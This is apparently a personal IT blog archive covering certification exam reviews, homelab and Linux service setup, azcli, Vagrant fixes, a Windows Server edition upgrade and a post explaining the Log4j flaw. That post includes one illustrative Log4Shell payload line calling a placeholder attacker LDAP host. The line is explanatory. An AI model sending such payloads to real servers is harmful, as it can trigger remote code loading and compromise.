Many of the topics in objective 2 can be practiced if you have a few VMs that run Windows, Windows Server and Linux to try out the various related tools. You can run these VMs on just about any recent laptop with 8GB or more of RAM and an i5/i7/i9 or similar Zen2 processor.

Virtual networking on objective 2 can be practiced with VMWare ESXi and pfSense.

The good part is that the software mentioned so far can legally be gotten for free. Windows is available for free use on 180-day licenses (which can be renewed multiple times). VMware ESXi can be gotten on a free license, also for studying/lab purposes.

Licensing and asset management are mostly theoretical on Server+.

Objective 3 is partially theoretical/conceptual, but there's a few practical aspects as well. Server hardening is something you can practice with the aforementioned VMs by reading and applying STIGs or CIS Benchmarks. If you're familiar with Ansible, you can even dive into the relevant playbooks. IAM can be practiced with Active Directory and/or Azure AD.
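For that hardening practice, OpenSCAP is a free way to measure a VM against CIS or STIG content. A rough sketch for a RHEL-compatible VM; the package names are standard, but the data-stream path and profile ID differ per distro and version, so list them with oscap info first.

sudo dnf install -y openscap-scanner scap-security-guide

# list the profiles shipped in the data stream (path varies per distro/version)
oscap info /usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml

# scan against one of the listed profiles and write an HTML report
sudo oscap xccdf eval --profile xccdf_org.ssgproject.content_profile_cis \
  --report /tmp/hardening-report.html \
  /usr/share/xml/scap/ssg/content/ssg-rhel9-ds.xml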

Objective 4 again is a nice mix of theory and practice. LogHub is a nice resource to read through all types of different log files. A lot of the other troubleshooting objectives can be exercised with the lab VMs and hardware I mentioned simply by trying to get it all to work :D That can sometimes already be a struggle, so you're troubleshooting!

Multiple objectives relate to services which you can run, configure and test on Linux VMs. NTP and SSH are two common ones, which I also include in my Linux+ labs. Ditto for the networking config + troubleshooting.
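As a concrete starting point for those service labs, this is more or less the loop you'd practice on a RHEL-compatible VM (an assumption on my part; package and service names differ on Debian-family distros).

# install, enable and verify time sync and SSH
sudo dnf install -y chrony openssh-server
sudo systemctl enable --now chronyd sshd

chronyc tracking        # is the clock actually syncing?
chronyc sources -v      # which NTP sources are being used?
sudo sshd -t            # syntax-check /etc/ssh/sshd_config after editing it
ss -tlnp | grep ':22'   # confirm sshd is listening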



Practical DevSecOps CTMP course and exam

2023-01-16 07:20:00

In early 2021 I needed to learn about DevSecOps and CI/CD and I needed it fast. A crash course if you will, into all things automation, pipelines, SAST, SCA, DAST and more. I went with PDSO's Certified DevSecOps Professional course, which included a 12h hands-on exam.

Here's my review from back then, TLDR: I learned a huge amount, their labs were great, their videos are good, their PDF was really not to my liking. 

Since then I've worked with a great team of people, team Strongbow at ${Bank}, and we've taught over a thousand engineers about PKI, about pentesting, about API security and about threat modelling. So when PDSO introduced their CTMP course (Certified Threat Modelling Professional) I jumped at the chance to formalize my understanding of the topic.

My review of the training materials is going to be very similar to that of CDP:

I took the exam yesterday and it was great, better than I expected!

For anyone looking for tips to take the CTMP exam:



An actual office for Unixerius

2023-01-08 19:58:00

Before and after redecoration

Way back when, over ten years ago, Dick had rented some local office space for Unixerius. He used it for storage; I don't think anyone ever did any actual work there. So, that rental space wasn't long-lived.

After Dick's passing in 2021, I took over running Unixerius in January of 2022. One practical hitch about owning a company which I didn't care for is having my private home address in the chamber of commerce's registry. That's why I rented a flex-desk at the now-defunct Data Center Almere.

As of the start of 2023 I'm renting actual office space again, at MAC3Park. They gave me a good deal on a 25m2 room, with electricity and Internet access included. And because the previous tenant had left in a hurry, there was even some furniture left behind! They were going to toss it all, but I was very happy to have a big desk, a decent chair and a comfy sofa!

The only downside to the room was the awfully bad paintjob a previous tenant had done. Dreary grey, with streaks, splotches, grease marks and overspray. I spent the week between Christmas and New Year's redecorating and cleaning. It's now a very, very comfortable office for work and studying!

The IKEA bookcase used to be in my kid's room and now holds memorabilia of past jobs, teams, colleagues and students.



Microsoft Natural Ergonomic 4000 keyboard: fixing non-functional key

2023-01-06 19:43:00

Keyboard membranes

I've been using Microsoft's ergonomic keyboards for close to twenty years now. I've had Comfort Curve models and Natural Ergonomic ones. The Natural Ergonomic 4000 has been my daily driver at the office for years. 

I hated it when it broke down. Or... When literally one of the keys broke down. Every single key on the keyboard worked fine, except the letter "c". It just wouldn't go. Nada. 

Thanks to user teevothis's disassembly video on YouTube, I found the hidden screws I never managed to find before.

Opening her up, yes there were quite some crumbs and dust. But nothing overtly wrong. Pressing contacts on the membranes directly worked as expected, but the "c" also didn't work this way. A quick visual check of the contacts for the "c" showed no damage, nor debris interfering with the contact.

Visual inspection of the traces leading to the "c" also didn't show any clear damage. It did show that the "c" key is at the end of a specific series of contacts, which explains why it's the only key on the whole keyboard that's malfunctioning: something is interfering with its individual trace(s).

There were a few splotches of brown on the keyboard membranes, which suggests I at one point spilled cola in my keyboard. So, I did something scary: I disassembled the actual membranes, which separate into three layers of plastic. There's the bottom layer with traces on top, a middle insulating layer and the top with traces on both sides of the plastic. 

To take the membranes apart, there are four places where the plastic was melted together which you need to carefully destroy. :D A scalpel will do fine, as long as you're very careful. 

I cleaned all three layers, on both sides each, and let'm dry. Putting things together bit by bit: Hallelujah! It worked again!

My hypothesis: some spillage from the cola had gotten into one of the layers of the membrane, shorting the trace for the "c" to its neighbor. Oddly, its neighbor wasn't affected.



Lock your laptops: the pentest fairy strikes!

2022-12-29 19:27:00

My colleague and I have often wondered about people leaving their laptops unattended and unlocked. We've found them in offices, in restaurants and even lavatories!

This inspired me to do a co-op with my daughter, who took my character design for the #pentest fairy and put her own twist on it. We now have a stack of vinyl stickers (safely removable!) which you can slap on any abandoned hardware.

"You had a visit from the Pentest Fairy! Lock your laptop!"



Practicing with azcli, to build an Azure DevOps lab

2022-07-09 20:52:00

This fall I am scheduled to teach an introductory class on DevSecOps, to my Linux+ students at ITVitae. Ideally, if things work out, this will be a class that I'll teach more frequently! It's not just the cyber-security students who need to learn about DevSecOps, it's just as important (if not more) to the developers and data scientists!

Since this course is going to be hands-on, I'm prepping the tooling to configure a lab environment with students forming small teams of 2-4. I'd hate to manually set up all the Azure DevOps and Azure Portal resources for each group! So, I'm experimenting with azcli, the Azure management command line tool. 

Sure, I could probably work even more efficiently with Terraform or ARM templates, but I don't have enough time on my hands to learn those from scratch. azcli is close enough to what I already know (shell scripting and JSON parsing) to get the show on the road.

Here's a fun thing that I've learned: every time one of my commands fails, I need to go back and make sure that I didn't forget to stipulate the organization name. :D 

For example:

% az devops security group membership add --group-id "vssgp.Uy0xLTktMT....NDk0" --member-id "aad.ODU0MjMyZTAtN...0MmVk"

Value cannot be null.

Parameter name: memberDescriptor

That command was supposed to add one of the student accounts from the external AD to one of the Azure DevOps teams I'd defined. But it kept saying that I'd left --member-id empty (which I clearly hadn't).

Mulling it over and scrolling through the output for --verbose --debug, I just realized: "Wait, I have to add --org to all the previous commands! I'm forgetting it here!". 

And presto:

az devops security group membership add --group-id "vssgp.Uy0xLTktMT....NDk0" --member-id "aad.ODU0MjMyZTAtN...0MmVk" --org "https://dev.azure.com/Unixerius-learning/"

That was it!
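A note for my future self: if I read the docs correctly, the az devops extension can also store a default organization (and project), which avoids repeating --org on every call. The project name below is a placeholder.

# store defaults once; subsequent az devops calls pick them up
az devops configure --defaults organization=https://dev.azure.com/Unixerius-learning/ project=MyProject

# show the currently configured defaults
az devops configure --list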

 



More beta exams! ISC2 ELCC and CompTIA Linux+ 005

2022-06-29 21:28:00

At the end of 2021 I took the beta version of CompTIA's Linux+ (XK1-005), which went live earlier this month as XK0-005. My opinions on the exam still stand: it's a solid exam with a good set of objectives. And luckily I passed. :D

Yesterday, I took part in another beta / pilot: (ISC)2's ELCC, also known as their Entry Level Cybersecurity Certification. I didn't take it to pad my own resumé, I did it to see if ELCC will make a good addition to my students' learning path. So far they've been using Microsoft's MTA Security (which is going away).

(ISC)2, most famously known for their CISSP certification, saw an opportunity in the market for an entry level security certificate. Some would call it a moneygrab... But the outcome of it, is their ELCC.

Looking at the ELCC exam objectives I have to say I like the overall curriculum: the body of knowledge covers most of the enterprise-level infosec knowledge any starter in infosec would need to know. It's very light on the technical stuff and focuses mostly on the business side, which I think is very important!

I've heard less-than-flattering reviews of (ISC)2's online training materials, meaning that I'd steer students to another source. And, having taken the exam, I have to admit that I think it's weak. 

Maybe it's because this was a beta exam, but a few topics kept popping up, with the same question and expected answer repeated in slightly different wordings. With 100 questions on the test, I was expecting a bit more diversity.

I also feel that a lot of the questions were about dry regurgitation: you learn definitions and when provided a description, you pick the right term from A, B, C or D. CompTIA's exams take a very different approach, where you're offered situations and varying approaches/solutions to choose from. 

Overall takeaways regarding (ISC)2's entry-level cybersecurity certification:



Nostalgia: VMEbus and OS-9

2022-06-15 06:35:55

Recently I've been thinking back on old computing gear I used to own, or worked on in college. Nostalgia has a tendency to tint things rosy, but that's okay. I get pangs of regret for getting rid of all my "antiques" (like the Televideo vt100 terminal, the 8088 IBM clone and my first own computer, the Presario CDS524), but to paraphrase the meme: "Ain't nobody got room fo' all that!"

Still, it was really cool to run RedHat 5 on the Compaq and having the Televideo hang off COM1 to act as extra screen and keyboard.

Anyway... that blog post I linked to, regarding RH5, also mentions OS-9. OS-9 was (and still is, thanks to NitrOS9) an OS ahead of its time: true multi-user and multi-processing, with realtime processing, all on hardware that was relatively affordable at the time. It had MacOS and Windows beat by at least a decade, and Linux was but a glint in the eyes of the future.

I've been doing some learning! In that linked blog post I referred to a non-descript orange "server". Turns out, that's the wrong word to use!

In reality that was a VMEbus "crate" (probably 6U) with space for about 8-10 boards. Yes it used Arcnet to communicate with our workstations, but those also turn out to be VMEbus "crates", but more like development boxen with room for 1-2 boards in a desktop box.

Looking at pictures on the web, it's very likely that the lab ran OS-9 on MVME147 boards that were in each of the crates.

Color me surprised to learn that VMEbus and its successors are still very much in active use, in places like CERN but also in the military! And in big medical gear too, as this teardown of an Agfa X-ray machine shows.

Cool stuff! Now I wanna play with an MC68k box again. :)



Comparing Linux+ objectives between XK0-004 and XK0-005

2022-05-11 17:43:00

Finally, the CompTIA Linux+ beta embargo has lifted! I can post the comparison I made of the objectives between XK0-004 and XK0-005!

In the spreadsheet, you'll see:



Passed the CKA exam

2022-05-08 09:19:00

It's been a long time coming, but I finally passed my CKA (Certified Kubernetes Administrator) exam yesterday.

When I say "a long time", I mean that this path of studying started back in August 2021, right after I finished teaching group 41 at IT Vitae. Back then, I started out on the Docker learning path at KodeKloud, to get more familiar with containerization in general. I'd considered going for the DCA exam, but comparing it to CKA I reconsidered and added a lot more study time to hop onward to Kubernetes.

I cannot say enough positive things about KodeKloud. The team has put a lot of effort into making great educational content, as well as solid lab environments. The cost-value comparison for KodeKloud is excellent! I plan on finishing their DCA content later this year, so I can then turn to Red Hat's EX180 (Docker/Podman and OpenShift) exam.

Aside from KodeKloud's training materials, the practice exams at Killer.sh were great. You get two free practice exams as part of your CKA exam voucher and I earned a third run by submitting some bug reports. 

Again, the value for money at killer.sh is great: in-depth exercises, a stable testing environment and an exam setup that properly prepares you for the online CKA testing environment.

Finally, the actual exam: registration was an okay process, signing in with the proctor went excellently and the exam itself worked fine as well. I did learn that Linux Foundation are very strict about the name put on your registration. I put in "T.F. Sluijter-Stek" because legally that is my identity, but they actually wanted "${FirstName} ${LastName}", so for me my "${DeadName} ${MaidenName}". Oh well; no biggie. The proctor was very patient while I went and updated my name on the portal.

So to summarize: 



Windows Server: upgrade from ServerDataCenterEval to ServerStandard

2022-04-18 15:52:00

For those who just want the answer to the question: "How do I upgrade a Windows Server DataCenter Evaluation edition to a licensed Windows Server Standard?", here's where I got my answer. I'll provide a summary at the bottom.

---

My homelab setup has a handful of Windows Server systems, running Active Directory and my ADCS PKI system. Because the lab was always meant to just mess around and learn, I installed using evaluation versions of Windows Server.

I kept re-arming the trial license every 180 days until it ran out (slmgr /rearm, as per this article). After the max amount of renewals was reached, I re-installed and migrated the systems from Win2012 to Win2019 and continued the strategy of re-arming. 

This year, I decided to spring for a Microsoft Partner ActionPack.

Signing up Unixerius for the partnership took a bit of fiddling and quite some patience. Getting the ActionPack itself was as simple as transferring the €400 fee to Microsoft and away I went!

The amount of licenses and resources you get for that money is ridiculously awesome. Among the big stack of coolness, for my homelab, it includes ten Windows Server 2019 and 2022 licenses. There's also great Azure and MS365 resources, which I'm definitely putting to good use; it's a great learning experience!

---

Upon inspection of my homelab, it turns out that most of my Windows VMs were installed as "Windows Server DataCenter Evaluation", simply because I wasn't aware of the difference between the Standard and DataCenter editions. Now I am. :)

It turns out that the ActionPack does not include licenses for DataCenter edition, so I needed to find a way to upgrade from the type "ServerDatacenterEval" to "ServerStandard". This great article helped me get this tricky situation fixed, because it's not completely simple.

Steps:

  1. Download the official Windows Server 2019 installation ISO from your partner center benefits dashboard.
  2. Make a snapshot or backup of your Windows server. 
  3. Login to the server with your account that has admin rights. 
  4. Start regedit.
    1. Go to HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion;
    2. Change CompositionEditionID to "ServerStandardEval".
    3. Change EditionID to "ServerStandardEval".
    4. Change ProductName to "Windows Server 2019 Standard".
  5. Close regedit. Do not reboot.
  6. Connect the Windows Server installation ISO to the VM (or DVD drive).
  7. Start setup.exe from the DVD.
    1. Follow the installation instructions.
    2. Choose to upgrade "Windows Server 2019 Standard" and opt to use the online patches and updates.
    3. This process should allow you to retain all software, configurations and data.
  8. The whole process of upgrading and installing will take hours.
  9. Upon completion, you will need to provide your license key. Using the Settings app and the activation tool may not work. Turn to the commandline and run: dism /online /set-edition:serverstandard /productkey: /accepteula. (See the verification commands below.)
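If you want to double-check which edition you're on, before and after the upgrade, these standard servicing commands should do the trick (just a quick sketch; your output will obviously differ):

dism /online /get-currentedition
dism /online /get-targeteditions
slmgr /dlv

The first shows the edition you're currently running, the second lists the editions you can upgrade to, and slmgr shows the detailed licensing state.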

kilala.nl tags: ,

View or add comments (curr. 0)

Some struggles are hard to break

2022-02-18 12:27:00

When you next have 15-20 minutes and some coffee/tea/beer/etc, I'd consider this article an interesting read for anyone in DevSecOps and InfoSec.

The Six Dumbest Ideas in Computer Security - Marcus Ranum

That dates back to 2005 and reminds me that "the more things change, the more they stay the same". We still struggle with a lot of these issues today and my team at $Client literally discussed some of these last week.

Is Ranum infallible? No. Is Ranum 100% correct? No, I'm sure he's not. Is point #4 dead wrong? Yes. But it's still a nice read to make you pause and think.

And, while we're traipsing down Memory Lane, here's Schneier in 2004 bringing up product safety standards for software products.


kilala.nl tags: ,

View or add comments (curr. 0)

Took the CompTIA Project+ beta

2022-01-29 11:04:00

Back in November, CompTIA announced the upcoming Project+ v5 certification exam. My day-to-day job does not entail project management, but I was curious about the exam anyway.

It's no secret that beta-testing CompTIA exams has become a hobby of mine. Thus, I jumped at the chance to take it, when someone posted about it on Reddit. As has become tradition, I pludged the exam: i.e. I went in with zero preparation, only browsing through the exam objectives document

My impressions of Project+ PK1-005 (to become PK0-005):

Overall, I'm feeling pretty good about this update to Project+. 

Will it be a valuable certificate for your resumé? Maybe not, with bigger brand names having more recognized project management certs. But will it rank up there with something like PSM-I or PSPO-I? Or something like PRINCE2 fundamentals? Yeah, probably. 

Finally, do I think I passed? I expect I didn't: my experience and knowledge of formal project management, especially things like PRINCE2, is very meager. 


kilala.nl tags: , ,

View or add comments (curr. 0)

VirtualBox and Vagrant error: E_ACCESSDENIED (0x80070005) - Access denied

2022-01-23 09:25:00

I've been using Vagrant for a lot of my quick tests and my classes for a while now. A few weeks ago, my old Vagrantfile configurations stopped working, with Vagrant and Virtualbox throwing errors like these:

There was an error while executing `VBoxManage`, a CLI used by Vagrant for controlling VirtualBox. The command and stderr is shown below.

Command: ["hostonlyif", "ipconfig", "vboxnet0", "--ip", "192.168.33.1", "--netmask", "255.255.255.0"]

Stderr: VBoxManage: error: Code E_ACCESSDENIED (0x80070005) - Access denied (extended info not available) 

VBoxManage: error: Context: "EnableStaticIPConfig(Bstr(pszIp).raw(), Bstr(pszNetmask).raw())" at line 242 of file VBoxManageHostonly.cpp

 

Or, in a more recent version of Virtualbox:

The IP address configured for the host-only network is not within the allowed ranges. Please update the address used to be within the allowed ranges and run the command again.

 Address: 192.168.200.11

 Ranges: 192.168.56.0/21

Valid ranges can be modified in the /etc/vbox/networks.conf file.

 

A search with Google shows that a few versions ago VirtualBox introduced a new security feature: you're now only allowed to whip up host-only networks in specific preconfigured ranges. Source 1. Source 2. Source 3.

The work-arounds are do-able: either add your desired range to /etc/vbox/networks.conf on the host (example at the bottom of this post), or switch the Vagrantfile to a named internal network.

While the former is more correct, I like the latter since it's a quicker fix for the end-user. 

BEFORE:

stat1.vm.network "private_network", ip: "192.168.200.33"

 

AFTER:

stat1.vm.network "private_network", ip: "192.168.200.33", virtualbox__intnet: "08net"

 

 

Apparently it's enough to give Virtualbox a new, custom internal network name. 
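For completeness, the first work-around would mean adding the ranges you actually use to /etc/vbox/networks.conf on the host. A minimal sketch, assuming VirtualBox 6.1.28 or newer and the 192.168.33.x / 192.168.200.x ranges from the examples above:

* 192.168.33.0/24 192.168.200.0/24

Each line starts with an asterisk, followed by one or more CIDR ranges that host-only interfaces are then allowed to use.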


kilala.nl tags: , , ,

View or add comments (curr. 0)

That one time I didn't beta-test two Mile2 exams

2022-01-22 16:00:00

Mile2 are a training company, aiming to provide vendor-neutral InfoSec training and certification exams. I've heard their name a few times, but have never taken any of their trainings. Reddit and TechExams also have few experiences posted about them.

That's why I was very curious and interested to join Mile2's beta program for their C)ISSO and C)PTE exams. These new versions are ANSI accredited (meaning they will require CPE points every three years) and have been renewed in a few other ways. Sounds like a great opportunity to give them a shot. Besides, taking beta exams is a hobby of mine.

Requesting access was a solid process, as you needed to submit a bit of a resumé to prove you'd be a valued reviewer/tester. I was approved for the program pretty swiftly, with clear instructions from their marketing team. 

I reported back to the team, with a few doubts about the sign-up process.

Half an hour later my access was revoked and I was ejected from the beta program, the team citing my "obvious distrust of their organization". Oh well.


kilala.nl tags: , ,

View or add comments (curr. 0)

Memes in corporate communications

2021-12-28 07:29:00

It's been years now since Internet meme imagery started showing up in corporate communications: from adverts to internal Powerpoint presentations, you've probably seen them. A quick talk at the office made me remember that classic episode of Star Trek: TNG, where the crew have a run-in with the Tamarians, who speak in metaphors.

It made me realize, as linguists have apparently been pointing out for aeons, that we as a global people could definitely head in the same direction. I mean, sure! My best friend Menno and I can speak in 90s animation memes! So why not?

Here's how you could explain the current Log4j hullabaloo in meme-speak.

JNDI:       There's no way this could go wrong!
Log4j:      ORLY?
Log4j:      Yo dawg, we heard you like resolvers in your logs! So we put...

2021:       Pwning log4j hypetrain, let's go! To the moon!
Researcher: Shit's on fire yo.
InfoSec:    My hair is on fire! My hair is on fire!
Management: Let's go! In-n-out! 20 minute adventure
InfoSec:    One does not simply ...
DevOps:     Science dog has no idea what he's doing.
DevOps:     I know nothing about ... at this point I'm too afraid to ask
InfoSec:    This is fine.

2031:       Remember when? ... Pepperidge farms remembers!

 


kilala.nl tags: ,

View or add comments (curr. 0)

Explanation of the Log4j vulnerability and how we got here

2021-12-27 15:37:00

two options for resolving variables in logging

Fabian Faessler, aka LiveOverflow, runs a wonderful YouTube channel where he explains all kinds of InfoSec and other hacking related topics. I'm a huge fan of his two-part explanation of the recent Log4j vulnerability. 

We've seen plenty of proofs-of-concept and rehashes of JNDI problems. In his videos, Fabian instead delves into the matter of how we even got into this mess.

The screenshot above is from part 2. It asks developers the honest question: what would have been better, more secure? Do we want a logging solution which can resolve arbitrary variables and macros? Or should we have a plain logger, which needs to be spoon-fed what it needs to log?

In secure design, we should always choose option B. But I guess that historically "features" and "shiny factor" won over "basic design".
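To make option A's risk concrete: because Log4j resolved lookups inside logged strings, anything an attacker could get written to a log became an instruction. A purely illustrative example, with made-up hostnames:

curl -H 'User-Agent: ${jndi:ldap://attacker.example/a}' https://victim.example/

If the target logs the User-Agent header through a vulnerable Log4j, that lookup gets resolved and the attacker's LDAP server gets contacted.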

If you have half an hour, I suggest you grab some coffee and go give this series a watch!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Mike Sass' excellent infosec training retrospective

2021-12-27 11:07:00

I just found this awesome page (a very long read), which is a retrospective of Mike Sass' five-year education path. Lots of good advice about studying infosec, and mini-reviews of many trainings (SANS and others). 

https://shellsharks.com/training-retrospective


kilala.nl tags: , ,

View or add comments (curr. 0)

I sat the CFR-410 beta: CertNexus CyberSec First Responder

2021-12-27 08:37:00

A few weeks ago CertNexus announced the public beta of their CyberSec First Responder (CFR) exam, version 410. Three years ago I took the beta for CFR-310. At the time I wasn't overly impressed by the exam, so I decided to take it again to see if they improved.

They did not. I can literally repeat what I said three years ago, just replacing "Examity" with "OnVue".

Comparing this to CySA+, I like CompTIA's exam a lot better.

My take-away: if you're in the US and must get a DoD 8570-listed certificate for one of the CSSP roles, then you may find CFR to be easier than CompTIA's CySA+ or Pentest+.

CFR is also marginally cheaper than CySA+ ($350 vs $370). But it's the renewal fees where you may want to opt for CompTIA, if you have more than one of their certs. Both companies charge $150 per three years, but in CompTIA's case the fees for multiple certs are often combined, so you don't have to pay multiple times. 

I'm curious to see what the end-result of my scoring will be. But if I do pass, I will not be paying my CFR annual fees.

EDIT:
One thing I don't like about the CFR-410 exam is this section on page 5 of the objectives document:

"The information that follows is meant to help you prepare for your certification exam. This information does not represent an exhaustive list of all the concepts and skills that you may be tested on during your exam. [...] The information beyond the domains and objectives is meant to provide examples of the types of concepts, tools, skills, and abilities that relate to the corresponding domains and objectives. All of this information [...] does not necessarily correlate one-to-one with the content covered in your training program or on your exam.

It sounds like they're saying: the exam may include specific tools and techniques not listed as examples on the objectives document. 

You could argue that's fair enough, because it's impossible to list every tool that you'll ever run into on the job. But on the other hand, it creates a moving target for students who are already anxious enough about taking a big exam. 

With CompTIA's exam objectives you can always count on it that "if it's not on the objectives, it's not on the exam". 


kilala.nl tags: , ,

View or add comments (curr. 0)

On the "why" of package managers

2021-12-24 09:43:00

On the CompTIA A+ Discord we got into a little chat about apt package management. Someone really wanted a real-world example. Since "apt install wireshark" doesn't really tell them much, I typed up the following. 

What we haven't been hitting on here and which might not come up in the objectives either is "why?". Why do we even need yum, apt, brew, choco, dnf and so on?

To answer that in as short a time as possible: installing software can be a tricky thing, because of "dependencies". Software needs more software, which needs more software, to run. 

A piece of software is almost never stand-alone: it needs libraries, drivers, programming language interpreters, supporting tools and so on. And if you start working with Python, Java, NodeJS and so on, you will really get stuck in "dependency hell". 

On Windows, standalone software installs often come as MSI or EXE installers. On Linux they come in the form of DPKG, RPM and other package formats. Now, if you want to run software that was installed via only such an installer, you'll quickly run into problems: "Help! I'm missing X, Y and Z! You need to install those too!"

Package managers like Yum, APT, Homebrew, Chocolatey and so on help us with that. They will look at the list of dependencies that such an RPM / DPKG might have and make a grocery list. :) "You want this? Fine, then we'll also get X, Y and Z and get'm setup for you."

That's the "WHY?". It makes sudo apt install wireshark so nice, because it'll fetch ALL the extras Wireshark needs to run. For example. 

Now Overwatch? That's gonna be interesting. Because where do all these packages come from? From "repositories": central databases of software packages. They are often run by the company making your chosen Linux distro, but there are also independent ones (like Chocolatey, Homebrew and more). Plus, commercial vendors often have their own repositories set up which you can subscribe to. This is how you would install GitLab, for example. 

Question is: do Blizzard have a repo to install Overwatch from? I don't know. :)


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another month, another beta: CertNexus CFR-410 and Project+

2021-12-22 16:16:00

Back in 2018, I took the CertNexus CFR-310 beta exam. It was okay. 

This week I learned that CN are launching CFR-410 with another beta (quoting their Facebook):

"Due to the high demand for the CFR-410 beta testers, we have decided to offer 75% off the voucher for the CFR-410 beta exam for a limited time. To participate, please go to https://bit.ly/CFR-410-voucher, create an account (or sign in), add the exam voucher to your cart and enter coupon code CFRBETA75 during checkout.

For more information on #CFR go to https://certnexus.com/certifica.../cybersec-first-responder/."

Final cost after discount: USD 87.50. I booked it and am waiting for the beta to open up. 

As a reminder, CFR-410 (and 310) are a security incident response exam, the acronym referring to CyberSec First Responder. It's comparable to CompTIA's CySA+ (Cybersecurity Analyst) and the much better GCIH (GIAC incident handler). I'm curious how this'll play out!

Speaking of other upcoming betas: Project+ 005 from CompTIA is coming up. And yes, they will run a beta exam, starting in January. I might be curious enough to just give it a shot, see what it's about. 


kilala.nl tags: , ,

View or add comments (curr. 0)

Took the CompTIA XK0-005 Linux+ beta

2021-12-05 09:09:00

Less than 48h ago, the new beta version of CompTIA's Linux+ exam, XK0-005, was opened to the general public. Or is it XK1-005?! I've asked them what's up with that XK0/XK1. Since taking CompTIA's beta exams is a big hobby of mine, I jumped onboard immediately!

Three years ago I was not very impressed by the XK0-004 beta. I felt it was too easy and too heavily focused on git and legacy software like init. Since there's an embargo on the objectives (which you can download from the official page I linked above) I can't discuss the objectives nor what's on the test. But I can tell you this much:

Some of the questions were really, really long. Like, "print this on A4 and it fills a whole page" long. I felt that might scare off the intended entry-level audience, so I put that in the comments. 

My conclusion: this exam is looking good! I would say that, content-wise, it's now on par with what I'd expect from RHCSA. I don't have recent experience with LPIC or LFCS; I should give those a look sometime soon. 

I expect that my next group of students at IT Vitae will still be testing against version 004, but I will start updating my training materials for the next groups. The objectives have changed thoroughly. 


kilala.nl tags: , ,

View or add comments (curr. 0)

I still don't regret switching to MacOS

2021-11-08 21:37:00

It has been almost exactly 18 years since I switched to MacOS, coming from Windows and Linux. November 2003! When the Powermac G5 was the hottest thing (literally). 

MacOS 10.3 was ready to drop and I was giddy about that beautiful, heavy cheesegrater under my desk. 

Why bring this up now? Because I just realized that the three laptops I'm using have all been great for us! Three MacBooks Air, two from 2014 and one from 2017. All with 8GB of RAM and the i5 CPU. And they still work perfectly fine for my daily needs! 

They run my Docker containers, my Linux VMs with VirtualBox and Vagrant, my BurpSuite and all my productivity tools. And they're still good looking, light and quiet. That was money well spent!


kilala.nl tags: , ,

View or add comments (curr. 0)

I tested CompTIA Server+ and it wasn't great

2021-10-29 09:21:00

I just passed CompTIA's Server+ exam, which was a "meh" experience. 

The exam crashed twice on the same PBQ (literally the very first question!), but the proctors were awesome about it.

In the first crash, not even the chat tool worked, so I powered down and not 1 minute later my phone rang. The proctor was very helpful in getting me back to my exam. The second time I went back to that broken question it hung again, but luckily chat was still working so the proctor reset my connection. 

In short: the exam has solidified my opinion that the CompTIA PBQs work badly on MacOS systems. The OnVue software clearly puts stress on the system, because my fans were going wild nonstop.

Based on the Server+ exam contents (I did not read any of the books) this is not a course/exam I would recommend to anyone with over a year of data center experience. It would make a nice introduction to someone starting as DC tech or Unix/Windows admin.


kilala.nl tags: , ,

View or add comments (curr. 0)

Renewing CompTIA certification

2021-10-12 13:08:00

A question that comes up pretty frequently on Discord, is about CompTIA's renewal process. Like ISC2, ECC and SANS/GIAC, CompTIA also have a program that works with CPE/CEU (study credits). However, they're actually a bit more flexible than the others.

Here's a nice comparison of the "easiest" ways to renew.

TLDR, you either:

 

Me, I've always gone for the last option, which is silly because getting PT+, CySA+ and CASP+ would have renewed all my certs for free. 😐 Wasted money.


kilala.nl tags: , ,

View or add comments (curr. 0)

Linux+ practice resources

2021-10-10 17:23:00

Here's a list of practice resources I suggest to my Linux+ students, for Bash and Linux in general.

Special mention:

Complete newb level:

Early on, for beginners:

Advanced:


kilala.nl tags: , , ,

View or add comments (curr. 1)

Where to go after Security+

2021-10-10 11:32:00

There's a question which commonly comes up on Discord. I thought I'd just make a blogpost out of my most common response.

"I need you to suggest me onto path after security+. I want to develop my pen-testing and web security skills."

Here's a great overview of all kinds of security certification tracks -> https://pauljerimy.com/security-certification-roadmap/

If you're a rookie pen-tester and need a start with the basics, then eLearnSec's eJPT was always a decent start.

Pentest+ is CompTIA's cert that tests for 1-2 years of professional experience (or bruteforce book-learning). In Paul's overview it's lower ("easier") than eJPT, which I disagree with.

For a little more experienced people, eWPT and eCPPT from eLearnSec were also decent. Or, if you want to pack a bit more oomph, go for PWK (pentesting with Kali) from Offensive Security. The capstone to PWK is the now famous OSCP practical hacking exam.

OSCP combines research skills, time management and documentation with technical challenges which are not "too hard" (their difficulty lies mostly in the huge variety offered).

There are many cool sites that offer free or affordable education through labs, like TryHackMe and HackTheBox. Personally I've been a fan of PentesterAcademy, who put out good quality content and whose courses can go really in-depth.

If you have an employer who's not afraid to spend some money on you and you still have budget left, consider the SANS trainings + GIAC exams. They're expensive, but have a good reputation and the trainings are awesome.

GSEC can be considered their next step after Security+. GCIH and GPEN are the GIAC "better-than" certs compared to CySA+ and Pentest+; their training courses SEC504 and SEC560 are awesome.

Finally, I'd like to plug Antisyphon trainings.

They offer very good value for money, via online trainings. Some of these are pay-what-you-can, letting you pay somewhere between $25 and $495. Others are fixed price, but well worth it.

Case in point -> Modern webapp pentesting with B.B. King.

That's $495 for 16 hours (4*4h) of online training with a group of fun students and the excellent B.B. King. It goes into a whole bunch of very important tactics and testing methods for modern web applications. Recommended!


kilala.nl tags: , , ,

View or add comments (curr. 0)

Another season of classes done, which has left me a bit empty

2021-10-09 17:57:00

Halfway through May I started teaching Linux+ to the cyber-security "Group 41" at ITVitae. It's been 16 classes since then, nearly a hundred contact hours with a marvelous group of students.

And now, like I've had before after finishing a big project, I'm feeling a bit empty. In 2017, not a day after finishing my OSCP exam, I quickly felt empty and lost. And now that I'm officially done with "my" kids, I'm also at a loss. It feels odd, not teaching them anymore.

So. Best look to the future! Hopefully I'll teach a new group in a few months and until then I'd like to shoot for the DCA and CKA Docker/K8S exams.


kilala.nl tags: , ,

View or add comments (curr. 0)

Homebrew CMS security issues

2021-08-23 21:22:00

Back in early 2019 I first learned how to properly apply CSP to my site's code. It was a very educational learning experience and by the end of it I managed to score an A+ in Mozilla's Observatory (which does compatibility and security checks on your site). 

Imagine my surprise when earlier today I learned that A) my CSP wasn't being used anymore, the header wasn't even set and B) my Observatory score had dropped to an F! Wow, what happened?!

It turns out that Dreamhost's PHP 7.3 setup wasn't applying my .htaccess file anymore. A switch to PHP 7.4 with their FastCGI setup and we're back in business. 
